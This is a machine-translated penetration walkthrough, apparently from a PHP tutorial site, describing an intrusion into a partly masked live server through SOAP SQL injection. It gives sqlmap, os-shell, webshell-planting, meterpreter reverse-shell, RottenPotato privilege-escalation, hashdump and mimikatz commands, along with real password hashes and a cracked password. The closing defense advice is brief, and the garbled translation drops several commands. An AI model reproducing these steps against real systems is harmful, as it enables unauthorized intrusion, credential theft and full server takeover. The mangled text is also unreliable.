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How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

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In the actual successful penetration process, the exploitation of vulnerabilities is the integration of multiple technologies, the practice of the latest technology. This penetration uses sqlmap to confirm the injection point, obtains the webshell through sqlmap, and combines msf to perform ms16-075 Elevate the privileges and finally obtain the system permissions of the target server. This article is a new extension of vulnerability exploitation. When conventional Nday privilege escalation fails, a classic case of ms16-075 successful privilege escalation is combined with msf.

1.1.1 Scan for soap injection vulnerabilities

1. Use the web services scanner in awvs to scan for vulnerabilities. Open awvs and select the web services scanner to scan for vulnerabilities, as shown in the figure As shown in 1, fill in the target url address in the wsdl url. Note that it must be asmx?wsdl. Some have asmx files. If not, you can fill it in directly, for example: http://1**.***.***. ***:8081/?wsdl.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 1 Perform soap injection vulnerability scanning

2. Processing sql blind injection

Passed Awvs scans and confirms that the URL address has SQL blind injection (26 places). In awvs, click "view http headers" on the right, copy its content to a text file, and process the vulnerable statements at the same time. In this example For example:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf
You need to replace the red text part with "-1*".

3. The complete header package contains the following content:

POST /Service1.asmx HTTP/1.1

Content-Type: text/xml

SOAPAction : "http://tempuri.org/ZcpdList"

Content-Length: 716

X-Requested-With: XMLHttpRequest

Referer: http://1* *.***.***.***:8081/?wsdl

Host: 1**.***.***.***:8081

Connection : Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0. 2228.0 Safari/537.21

Accept: */*

< ;SOAP-ENV:Body>




1.1.2 Confirm soap injection vulnerability

1. Use sqlmap to detect whether there is a sql injection vulnerability. Add the previous header to Save the content as 1**.***.***.***.txt, copy the file to the directory where the sqlmap.py program is located, and execute the command: sqlmap.py -r 1**.***. ***.***.txt, confirm the information prompted by sqlmap:

custom injection marker ('*') found in option '--data'. Do you want to process it ? [Y/n/q] [color=Red]y[/color]

SOAP/XML data found in POST data. Do you want to process it? [Y/n/q][color= Red]y[/color]

As shown in Figure 2, sqlmap confirms that the sql injection vulnerability exists, and the database server is windows 2008 R2, the database version is sql server 2008, and the soap vulnerability is union query.

Figure 2 There is a soap injection vulnerability

2. Check whether the database has dba permissions (1) Automatically submit parameters for testing as shown in the figure As shown in 3, after executing the command: sqlmap.py -r 1**.***.***.***.txt --is-dba --batch, you need to confirm y twice, because the parameters are used "batch", sqlmap will automatically submit the judgment value.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf
Figure 3 Automatically submit parameters for judgment

(2) Obtain the dba account of the user used in the current database. As shown in Figure 4, the current user is dba in sqlmap, and the displayed result is true. This result shows that the database uses sa permissions and the webshell can be obtained through the os-shell parameter.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf
Figure 4 Determines whether it is a dba account

3. Get the sa account password

As shown in Figure 5, use the command sqlmap.py -r 1**.***.***.***.txt --password -- Batch directly obtains the password values ​​corresponding to all accounts connected to the database:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 5 Obtains the sa account password

4. Crack sa account password The database password hash value was successfully obtained through sqlmap earlier:

##MS_PolicyEventProcessingLogin## [1]:

Password hash: 0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838 ##MS_PolicyTs qlExecutionLogin## [1]:

password hash: 0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c sa [1]:

password hash: 0x0100b7b90b706f339288fb0ab4c8a099c4de53045d 2de6297e28 Query the password value "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28" corresponding to sa on www.cmd5.com, as shown in Figure 6. The decryption result is "qaz123WSX".

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 6 Decrypted sa password hash value

1.1.3 Get webshell through --os-shell1. Get os-shell in sqlmap Execute the command in: sqlmap.py -r 1**.***.***.***.txt --os-shell, confirm the information in the sqlmap execution window:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

You can also execute the sqlmap.py -r 1**.***.***.***.txt --os-shell --batch command without manual input.

2. Find the directory where the web program is located

(1) View files and directories

After executing the dir c:\ command, you can view the c directory and files, and continue to view " dir c:\inetpub\wwwroot" as shown in Figure 7. There is no web program in this folder, so exclude this directory.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 7 View files and directories

(2) Obtain the real directory of the website By viewing the c, d, e, f disks in sequence, in Obtain the suspected website program files from the e drive and use the command dir e:\software\AMS_NoFlow, as shown in Figure 8.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 8 View website files

3. Test the real directory of the website

(1) Generate file test As shown in Figure 9, use the echo command: echo "thisis test">e:\software\AMS_NoFlow\t.txt to generate a t.txt file in the root directory of the website. The content is thisis test.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 9 generated file

(2) Website access test

Enter the address http:// in the browser 1**.***.***.***/1.txt for testing. As shown in Figure 10, the obtained content is consistent with expectations. This directory is the real physical address of the website.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 10 Website access test

4. Get the content of the web.config configuration file

In os- In the shell, execute the type e:\software\AMS_NoFlow\web.config command to view the contents of the web.config file. In the sqlmap command window, due to setting problems, you may not be able to view its complete contents. However, sqlmap will in its output directory. Keep the details as shown in Figure 11. Open the log file and you can see that the password corresponding to the sa account is qaz123WSX, which is consistent with the sa password cracked earlier.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 11 View the content of the web.config configuration file

5. Obtain the ip address information

As shown in the figure As shown in 12, by executing the ipconfig command in os-shell, you can obtain the IP address configuration of the target. The target is configured with independent external network IP and internal IP addresses. You can also execute other commands in os-shell.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 12 Get IP address

6. Get webshell test

(1) Generate shell file

Execute the command in os-shell:

echo ^^ > e:\software\AMS_NoFlow\cmd.aspx

As shown in Figure 13, the echo result shows 1 and no other information, indicating that the file generation command is successful.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 13 Generate webshell

(2) Obtain webshell Use the Chinese Chopper backdoor management tool to create a record http://1**.***.***.***/cmd.aspx. The backdoor password is: pass, as shown in the figure As shown in 14, the connection is successful and the webshell is successfully obtained.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 14 Obtaining webshell

1.1.4 Conventional method failed to escalate privileges

1. Generate system information File Execute the command in os-shell:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

2. Download the Windows-Exploit-Suggester program Windows-Exploit-Suggester download address: https://github. com/GDSSecurity/Windows-Exploit-Suggester/

3. Update the vulnerability library and compare the vulnerability. Execute windows-exploit-suggester.py -u in python to update and compare the vulnerability library: windows-exploit-suggester.py --audit -l --database 2018-06-04-mssb.xls --systeminfo SYD1-0081DSB.txt > SYD1-0081DSB-day.txt, as shown in Figure 15.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 15 for vulnerability comparison

4. Check the vulnerability situation Open SYD1-0081DSB-day in the C:\Python27 directory .txt file, as shown in Figure 16. You can see that the program determines that the operating system is the Windows 2008 R2 version, and there are multiple vulnerabilities. The latest vulnerability is ms16-075.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 16 View vulnerability status

5. Perform privilege escalation test on existing vulnerabilities. Find and organize exploits according to vulnerability number. file, perform a privilege escalation test on the target server. Except for ms16-075exp, all tests fail and privilege escalation cannot be performed.

1.1.5 Use msf to elevate ms16-075 privileges

1. Use msf to generate a rebound Trojan

Execute the command below msf:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

The windows/meterpreter/reverse_tcp rebound port type, lhost is the server IP address of the rebound connection. Note that the IP address must be an independent server or must be an external network port mapping. Change In other words, the bounce must be received, lport is the bounce port, and 4433 is the generated program.

2. Execute the listening command on the listening server

(1) Start msf


(2) Configure meterpreter parameters

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

3. Upload the 4433.exe program to the target server and execute it

Upload the 4433.exe file to the target server and use the Chinese Color Knife or os-shell for execution.

4. View system information

As shown in Figure 17, the target bounces to the listening server, executes sysinfo, and obtains its system information.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 17 Obtaining system information

5. Failure to use meterpreter’s built-in privilege escalation function

Execute separately in meterpreter The getuid and getsystem commands, as shown in Figure 18, failed to successfully escalate privileges.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 18 Failure to escalate privileges using the default meterpreter

6. Use ms16-075 to escalate privileges

(1) ms16-075 can be downloaded using exp https://github.com/foxglovesec/RottenPotato

(2) Upload potato file

Upload potato.exe file through webshell, or in msf Execute the following command to upload: upload /root/potato.exe

(3) Obtain system permissions and execute the following commands in sequence:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

As shown in Figure 19, system permissions were successfully obtained.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 19 Obtain system permission tokens

(4) Obtain system permissions and execute commands respectively:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

As shown in Figure 20, system permissions were successfully obtained.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 20 Obtain system permissions

(5) Obtain password

Execute the command under meterpreter: run hashdump command, as shown in Figure 21, successfully obtain the server password hash value: Administrator:500:aad3b435b51404eeaad3b435b51404ee:a59a64a645487c1581dea603253c7920:::

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

##Figure 21 Obtaining the password

In this example, load mimikatz is still used to obtain the plaintext password, but the acquisition effect is not ideal. Execute the command: kerberos, livessp, msv, ssp, tspkg , wdigest cannot obtain the clear text password, you can also execute the command mimikatz_command and enter the mimikatz command prompt to operate.

(6) Crack ntml password Copy the ntml password hash value a59a64a645487c1581dea603253c7920 to cmd5.com for cracking. cmd5 requires a fee, you can also go to: http://www.objectif-securite.ch/ en/ophcrack.php and https://www.somd5.com/ website to crack the password, as shown in Figure 22, the password was successfully cracked.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 22 Crack the ntlm hash value

7. Log in to the server via nmap -sS -Pn -A 1**. ***.***.*** or masscan -p 1-65535 1**.***.***.*** perform a port scan and find that the server has port 3389 open. Use mstsc to log in, such as As shown in Figure 23, you successfully logged in to the server.

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf

Figure 23 Successful login to the server

1.1.6 Summary and defense

1. The main purpose of this penetration Command summary

(1) sqlmap execution command

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf
## (2) Execution command under os-shell

ipconfigdir c:/echo "thisis test">e:\software\AMS_NoFlow\t.txtecho ^^ > e:\software\AMS_NoFlow\cmd.aspx

(3) Execute the command under msf to generate a rebound Trojan:

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf(4) msf startup and monitoring

msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST (actually the external IP address) set LPORT 4433exploit

(5)ms16-075 privilege escalation command

use incognitolist_tokens -uexecute -cH -f ./potato.exelist_tokens -u impersonate_token "NT AUTHORITY\ \SYSTEM"getuid

(6) Get the password run hashdump

(7) mimikatz to get the password

load mimikatzkerberos, livessp, msv, ssp, tspkg, wdigest (test each command one by one, some will display the plain text password) mimikatz_command: mimikatz command prompt window

(8) Obtain the password under the mimikatz command line (not tested)

How to escalate privileges by injecting soap into a sql2008 server and combining it with msf2. Penetration summary

In this penetration, the soap injection test was performed through sqlmap, and the sql injection point was determined to be available through sqlmap, and the subsequent success was through os-shell Obtained webshell. After obtaining the webshell, I tried to escalate the privilege through the conventional Nday method, but the result failed. I then used msf to cooperate with ms16-075 to escalate the privilege. Windows-Exploit-Suggester is still able to determine and test local vulnerabilities. Through its audit, the latest vulnerabilities are used to escalate privileges, and the basic hit rate is 99%.

3. Security Defense

After successfully penetrating the server, no security protection software was found on the server. Based on experience, the author recommends the following security defense:

(1) Filter soap parameters and filter dangerous parameters that lead to SQL injection.

(2) The mssql database uses low-privilege users for database connections.

(3) The server is regularly patched and upgraded.

(4) Install anti-virus software, waf and hardware firewall to increase the cost and difficulty of attack

The above is the detailed content of How to escalate privileges by injecting soap into a sql2008 server and combining it with msf. For more information, please follow other related articles on the PHP Chinese website!

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